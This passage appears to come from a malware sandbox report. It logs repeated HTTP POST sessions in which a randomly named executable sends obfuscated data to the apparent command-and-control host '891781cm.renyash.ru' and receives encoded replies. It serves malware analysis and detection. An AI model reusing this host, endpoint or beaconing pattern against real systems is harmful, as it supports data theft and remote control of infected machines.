                                                                                                                  Jan 1, 2025 15:03:23.618761063 CET1072OUTData Raw: 50 55 58 5d 5a 5b 51 5c 55 5a 54 59 51 52 55 5c 58 5f 5c 5a 59 54 52 5f 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PUX]Z[Q\UZTYQRU\X_\ZYTR_][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ \</X71Y&>6*$2W9'(%/=3?X,4^<0U),#^!'^)
                                                                                                                  Jan 1, 2025 15:03:23.727207899 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:23.901082039 CET804INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:23 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OcmOhPebQWLL%2BbLKGUDxUCJkNmJY8FgHL8sa74Aiyxw20iYv7b4tf80S6F1OZIN%2B%2FIfOw04Ltx2liWqUPg2C6d3gU3xF0BXNN9eXCO52Qk24lnvZNfQJgYBs9dGcAmz9scdCWEoq"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d70f85843e0-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3505&min_rtt=1801&rtt_var=4084&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=94577&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  101192.168.2.450023104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:24.027158022 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:24.384682894 CET1072OUTData Raw: 50 55 58 56 5a 58 51 5d 55 5a 54 59 51 52 55 54 58 5f 5c 5a 59 55 52 52 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PUXVZXQ]UZTYQRUTX_\ZYURR][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#+Y!X71_%.\*>0$%9$'$,)'/,8> (.$W)#^!'^)
                                                                                                                  Jan 1, 2025 15:03:24.468415976 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:24.733659029 CET807INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:24 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ePLg1Q87TQvXJ%2Bk4xo5sSWqh%2BzdsasJKhV5gJ4Y7Um1dRitvqcTtDUzXkH%2BB0JPdT0laAc03YPHXLMdkDN%2FxY6WUf5isodJJJla4jSfaEE8vsNuhkWvcoKV1QJ49KPpuJspIawCD"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d75ac015e73-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2573&min_rtt=1630&rtt_var=2499&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=159024&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  102192.168.2.450029104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:24.857713938 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:25.214546919 CET1072OUTData Raw: 50 51 5d 57 5a 59 51 5b 55 5a 54 59 51 5a 55 5d 58 5f 5c 5c 59 5c 52 5f 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PQ]WZYQ[UZTYQZU]X_\\Y\R_][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ](!\!89X&= 3:Q-$''?)&,/^8,_?U*#^!'^)#
                                                                                                                  Jan 1, 2025 15:03:25.310672998 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:25.582638979 CET812INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:25 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yBeukZsGhjQ8fGFq%2F9%2BB3YPCzZAIZpTaVtxaCrHR5d5gQaw4oxV9QN%2B9WLeH9lxaq5IJKg%2BZoqeONUAV71L8X%2FIiW%2FyRPVT3HITr30LGMWfA53HjVntR%2BjPYjmr70oNYbJ0YOeMs"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d7aec2e0f9b-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4381&min_rtt=1671&rtt_var=6046&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=62524&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  103192.168.2.450036104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:25.835115910 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1064
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:26.181437969 CET1064OUTData Raw: 55 53 58 55 5a 58 54 5e 55 5a 54 59 51 5b 55 52 58 5c 5c 5f 59 50 52 5f 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: USXUZXT^UZTYQ[URX\\_YPR_][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#(?"!89%>&(=7$4.,',)0/X;;==7)#^!'^)


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  104192.168.2.450039104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:26.203515053 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1796
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:26.556313038 CET1796OUTData Raw: 50 52 58 53 5f 5a 54 5f 55 5a 54 59 51 52 55 50 58 5c 5c 5c 59 55 52 5a 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PRXS_ZT_UZTYQRUPX\\\YURZ][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ^<!4+*$=))3Y'$"V:B$_$<='/^->(_(;=#^!'^)
                                                                                                                  Jan 1, 2025 15:03:26.644721031 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:26.864029884 CET960INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:26 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ztT8EHYRPJDBvrnakJDCy%2FyXGRj%2FDSOVV%2FHpnDegBYGhfCwAqS0iVMVN3M5MReI%2FX%2FEyLqTAB5tR%2Fa3ZnlZFQEhBZvVHUEeMh5PDlSjwqoiuKuS5xWOlnwLBMaGpGqfiyAlUfM5p"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d833c2d7c94-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2302&min_rtt=1948&rtt_var=1439&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2140&delivery_rate=305183&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 22 51 27 3b 20 00 3c 2e 3e 10 2d 2c 3f 50 25 11 08 5d 30 09 3b 07 32 07 22 04 2d 16 0d 03 3f 38 30 01 26 2a 21 5b 21 21 3d 04 24 36 2e 5d 04 1d 26 05 3e 14 25 04 3f 3f 2e 02 29 0c 30 5d 33 09 23 1e 31 1a 23 05 27 3e 2e 5a 35 32 02 0f 33 0d 01 0b 2b 00 38 00 26 3d 2a 50 34 2a 2e 57 0d 12 22 1c 31 2d 26 0d 3e 0f 24 54 22 12 3b 1c 24 3f 2c 0d 27 3c 24 1d 37 01 21 0a 29 01 20 12 36 0e 3d 51 33 3a 24 01 22 17 31 59 22 33 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"Q'; <.>-,?P%]0;2"-?80&*![!!=$6.]&>%??.)0]3#1#'>.Z523+8&=*P4*.W"1-&>$T";$?,'<$7!) 6=Q3:$"1Y"3"T /T=VO0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  105192.168.2.450042104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:26.325256109 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:26.681387901 CET1072OUTData Raw: 50 56 58 5c 5a 5f 51 59 55 5a 54 59 51 53 55 50 58 59 5c 58 59 56 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PVX\Z_QYUZTYQSUPXY\XYVR[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#? &>))-4$7=94$<"&<'[/>_((,#^!'^)
                                                                                                                  Jan 1, 2025 15:03:26.789350033 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:26.966365099 CET819INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:26 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iEghwlMP97K6QUbYGqiC%2F89YJZ%2F4Qya4CRuoLzgg%2FlGTAzxq8FsGKnR%2FrMa9AdN%2FrRL6gYpx5Jgxcsed%2F%2FaEfepdW%2BwtKgj1qIOizzOiUxRscqhfTBAu825jzjwNDZa5GX%2Fdmrab"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d84295e8c81-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=20033&min_rtt=16813&rtt_var=12746&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=34288&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  106192.168.2.450048104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:27.087575912 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:03:27.446907043 CET1072OUTData Raw: 55 51 58 53 5a 5c 54 59 55 5a 54 59 51 53 55 53 58 5a 5c 5e 59 57 52 53 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UQXSZ\TYUZTYQSUSXZ\^YWRS][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ Y)?*71.2=. '7!.'73&3?/./(>8=<#^!'^)
                                                                                                                  Jan 1, 2025 15:03:27.556474924 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:27.727710962 CET808INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:27 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bmMcJjF4pjp05t3oMDSccHgACqb8ugx7wHme995DeoRtrOX%2Ba3TP5%2FKVKkUoroxVtuu8JPL%2BEZ5lBKcsIAqh1LBqebsWvaBiwf8PHWeiBo4zlspQ%2FfxghzQTWdPncmgmFh%2B9OJ87"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d88dcc84394-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4148&min_rtt=1752&rtt_var=5449&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=69779&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  107192.168.2.450054104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:27.910217047 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:28.260385990 CET1072OUTData Raw: 55 54 5d 53 5f 59 54 5f 55 5a 54 59 51 53 55 53 58 5e 5c 5b 59 5d 52 58 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UT]S_YT_UZTYQSUSX^\[Y]RX][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#)?=X +-_2>=>,$-9$%?0< /;?>3*#^!'^)
                                                                                                                  Jan 1, 2025 15:03:28.375190973 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:28.635744095 CET801INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:28 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tEW2z6J3%2BfVNSk5kTUiH3dZ%2By7ZMj3GvQDMR%2F9OUZ28TFBqpI3vOYuqx8doUI6WcRzug6LWfXi4yMsEeggWzso5AYkWkM5ddlscXnNgfx61i1inAN0hb6tVOWNGcIw36YyUx%2Fms0"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d8e0bf48ca1-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4784&min_rtt=2027&rtt_var=6275&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=60616&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a
                                                                                                                  Data Ascii: 41V[X
                                                                                                                  Jan 1, 2025 15:03:28.726680040 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  108192.168.2.450061104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:28.855739117 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:29.212543011 CET1072OUTData Raw: 50 52 5d 50 5f 5d 51 5a 55 5a 54 59 51 5c 55 50 58 5a 5c 58 59 50 52 5d 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PR]P_]QZUZTYQ\UPXZ\XYPR]][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ X(?=X %%=%(.Z0:?')$8/(;>#^!'^)
                                                                                                                  Jan 1, 2025 15:03:29.324117899 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:29.610662937 CET812INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:29 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sUUDtdNb8HfizYPRcINalUvP2%2F0jSe%2BceqjoqcaIrmXr6ctNdaA4AhMa8wXrqhDmMoPhhN3A%2FEJa0%2BW1EY79yjNu6FM7gRiqHT7%2FZpsvdV%2BljiyPv7pAvSrLcTw2voer6S%2BLOy98"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d93fa2d32fc-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4966&min_rtt=1942&rtt_var=6776&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=55861&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  109192.168.2.450067104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:29.732331991 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:30.087661028 CET1072OUTData Raw: 50 56 58 51 5a 5a 54 5d 55 5a 54 59 51 58 55 57 58 5e 5c 5f 59 55 52 59 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
